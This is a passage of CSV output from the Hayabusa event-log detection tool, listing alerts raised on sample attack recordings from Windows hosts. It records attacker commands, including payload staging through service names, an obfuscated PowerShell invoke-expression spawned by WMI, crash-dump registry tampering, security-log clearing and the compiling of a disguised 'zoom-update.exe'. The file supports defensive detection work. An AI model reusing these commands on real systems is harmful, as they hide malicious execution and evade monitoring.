2021-11-03 17:40:12.215 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg237"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x888 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:40:12.215 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg237"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x394 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:40:13.660 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg238"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe24 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:40:13.660 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg238"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc54 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:40:15.098 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg239"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x22c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:40:15.113 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg239"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf34 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:40:16.552 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg240"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x68c | User: FS03$ | LID: 
0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:40:16.552 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg240"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xdf8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:40:18.002 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg241"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xa4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:40:18.002 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg241"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xb1c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated 
Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:40:19.468 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg242"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x608 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:40:19.484 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg242"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x874 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:40:20.926 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg243"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xab4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:40:20.942 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd 
Line: powershell -command ""Get-Service ""seg243"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xeb4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:40:22.374 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg244"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xdf0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:40:22.390 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg244"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x944 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:53:41.099 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x580 | User: FS03$ | LID: 
0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-08 19:26:55.123 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\LogEvent: DWORD (0x00000001) | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx 2021-11-08 19:26:55.123 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\SendAlert: DWORD (0x00000000) | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx 2021-11-08 19:26:55.123 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\CrashDumpEnabled: DWORD (0x00000007) | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered 
Execution/ID13-WMIimplant registry crash control.evtx 2021-11-08 19:26:55.123 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\Overwrite: DWORD (0x00000001) | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx 2021-11-08 19:26:55.123 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\KernelDumpOnly: DWORD (0x00000000) | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx 2021-11-08 19:26:55.123 +09:00,fs03vuln.offsec.lan,13,medium,,CrashControl CrashDump Disabled,,../hayabusa-rules/sigma/registry_event/registy_event_crashdump_disabled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx 2021-11-08 19:26:55.123 +09:00,fs03vuln.offsec.lan,13,medium,,CrashControl CrashDump Disabled,,../hayabusa-rules/sigma/registry_event/registy_event_crashdump_disabled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx 2021-11-08 19:26:55.139 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows 
Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\AutoReboot: DWORD (0x00000001) | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx 2021-11-08 19:26:55.139 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\DumpFile: [comma-separated decimal byte dump of the DumpFile value removed] | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx 
2021-11-08 19:26:55.139 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\MiniDumpDir: %%SystemRoot%%\Minidump | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx 2021-11-08 19:26:59.790 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\LogEvent: DWORD (0x00000001) | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx 2021-11-08 19:26:59.790 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\SendAlert: DWORD (0x00000000) | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx 2021-11-08 19:26:59.790 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: 
HKLM\System\CurrentControlSet\Control\CrashControl\CrashDumpEnabled: DWORD (0x00000007) | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx 2021-11-08 19:26:59.790 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\Overwrite: DWORD (0x00000001) | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx 2021-11-08 19:26:59.790 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\KernelDumpOnly: DWORD (0x00000000) | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx 2021-11-08 19:26:59.790 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\AutoReboot: DWORD (0x00000001) | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: 
A57649D1-1303-6179-D9C8-010000000000",../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx 2021-11-08 19:26:59.790 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\DumpFile: %%SystemRoot%%\MEMORY.DMP | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx 2021-11-08 19:26:59.790 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\MiniDumpDir: %%SystemRoot%%\Minidump | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx 2021-11-08 19:26:59.790 +09:00,fs03vuln.offsec.lan,13,medium,,CrashControl CrashDump Disabled,,../hayabusa-rules/sigma/registry_event/registy_event_crashdump_disabled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx 2021-11-08 19:26:59.790 +09:00,fs03vuln.offsec.lan,13,medium,,CrashControl CrashDump 
Disabled,,../hayabusa-rules/sigma/registry_event/registy_event_crashdump_disabled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx 2021-11-09 00:01:27.604 +09:00,fs03vuln.offsec.lan,1,high,,Process Created_Sysmon Alert,"technique_id=T1086,technique_name=PowerShell | Cmd: powershell $env:I4Pzl|.(Get-C`ommand ('{1}e{0}'-f'x','i')) | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: OFFSEC\admmig | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x35d1aad | PID: 1860 | PGUID: A57649D1-3BC7-6189-091B-5D0300000000 | Hash: SHA1=9F1E24917EF96BBB339F4E2A226ACAFD1009F47B,MD5=C031E215B8B08C752BF362F6D4C5D3AD,SHA256=840E1F9DC5A29BEBF01626822D7390251E9CF05BB3560BA7B68BDB8A41CF08E3,IMPHASH=099B747A4A31983374E54912D4BB7C44",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID1-WMI spwaning PowerShell process - WMImplant.evtx 2021-11-09 00:01:27.604 +09:00,fs03vuln.offsec.lan,1,high,Exec,Suspicious PowerShell Parent Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_powershell_parent_process.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID1-WMI spwaning PowerShell process - WMImplant.evtx 2021-11-09 00:01:27.604 +09:00,fs03vuln.offsec.lan,1,high,Exec,WMI Spawning Windows PowerShell,,../hayabusa-rules/sigma/process_creation/proc_creation_win_wmi_spwns_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID1-WMI spwaning PowerShell process - WMImplant.evtx 2021-11-09 00:01:27.604 +09:00,fs03vuln.offsec.lan,1,high,Exec,Wmiprvse Spawning 
Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID1-WMI spwaning PowerShell process - WMImplant.evtx 2021-11-09 00:01:27.604 +09:00,fs03vuln.offsec.lan,1,low,Exec,Non Interactive PowerShell,,../hayabusa-rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID1-WMI spwaning PowerShell process - WMImplant.evtx 2021-11-13 23:08:45.929 +09:00,FS03.offsec.lan,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: admmig | Target User: hack1 | IP Address: - | Process: | Target Server: cifs/fs03vuln.offsec.lan,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688-4648 Lateral movement with net use.evtx 2021-11-13 23:30:53.638 +09:00,FS03.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1134-Access Token Manipulation/ID4688,4648,4624-Runas execution with different user.evtx" 2021-11-13 23:30:58.226 +09:00,FS03.offsec.lan,4624,info,,Logon Type 2 - Interactive,User: hack1 | Computer: FS03 | IP Addr: ::1 | LID: 0xa6f5fa4 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1134-Access Token Manipulation/ID4688,4648,4624-Runas execution with different user.evtx" 2021-11-13 23:30:58.226 +09:00,FS03.offsec.lan,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: admmig | Target User: hack1 | IP Address: ::1 | Process: C:\Windows\System32\svchost.exe 
| Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1134-Access Token Manipulation/ID4688,4648,4624-Runas execution with different user.evtx" 2021-11-13 23:30:58.226 +09:00,FS03.offsec.lan,4672,info,,Admin Logon,User: hack1 | LID: 0xa6f5fa4,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1134-Access Token Manipulation/ID4688,4648,4624-Runas execution with different user.evtx" 2021-11-13 23:30:58.226 +09:00,FS03.offsec.lan,4624,info,,Logon Type 2 - Interactive,User: hack1 | Computer: FS03 | IP Addr: ::1 | LID: 0xa6f5fc2 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1134-Access Token Manipulation/ID4688,4648,4624-Runas execution with different user.evtx" 2021-11-18 16:40:29.566 +09:00,PC-01.cybercat.local,1,high,,Process Created_Sysmon Alert,"technique_id=T1059,technique_name=Command-Line Interface | Cmd: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /nologo /target:exe /out:zoom-update.exe C:\Users\pc1-user\Desktop\zoom-update.cs | Process: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | User: CYBERCAT\pc1-user | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x678fe | PID: 2604 | PGUID: 510C1E8A-036D-6196-6801-000000000F00 | Hash: SHA1=22A72E39D307BC628093B043EF058DB1310BBF4B,MD5=28D96A80131C05E552066C798C0D8ACB,SHA256=C5270C0D8718C66382240DB538F9BACDED8DB55424768C2D942A6210B96B2720,IMPHASH=EE1E569AD02AA1F7AECA80AC0601D80D",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/YamatoSecurity/T1027.004_Obfuscated Files or Information Compile After Delivery/sysmon.evtx 2021-11-18 16:40:29.774 
